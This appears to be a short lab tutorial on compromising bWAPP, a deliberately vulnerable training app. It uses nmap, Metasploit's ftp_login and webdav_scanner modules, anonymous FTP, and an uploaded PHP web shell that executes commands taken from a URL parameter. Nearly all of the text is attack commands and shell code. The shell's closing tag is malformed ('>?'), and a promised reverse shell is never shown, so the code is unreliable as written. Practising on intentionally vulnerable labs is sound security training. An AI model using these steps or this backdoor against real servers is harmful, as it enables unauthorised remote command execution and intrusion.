The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:
- First run nmap and closely verify all the services
- Run Metasploit Framework and exploit webdav and enable it
- Run FTP and login and upload your backdoor
- Access your backdoor through web browser and get reverse shell
# msfconsole
msf > search ftp_login
msf > auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit
msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit
# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:
ftp> ls
ftp> put backdoor.php
backdoor.php code:
<?php
print_r(($_GET['x'])?exec($_GET['x']):'');
>?
Address Bar:
192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd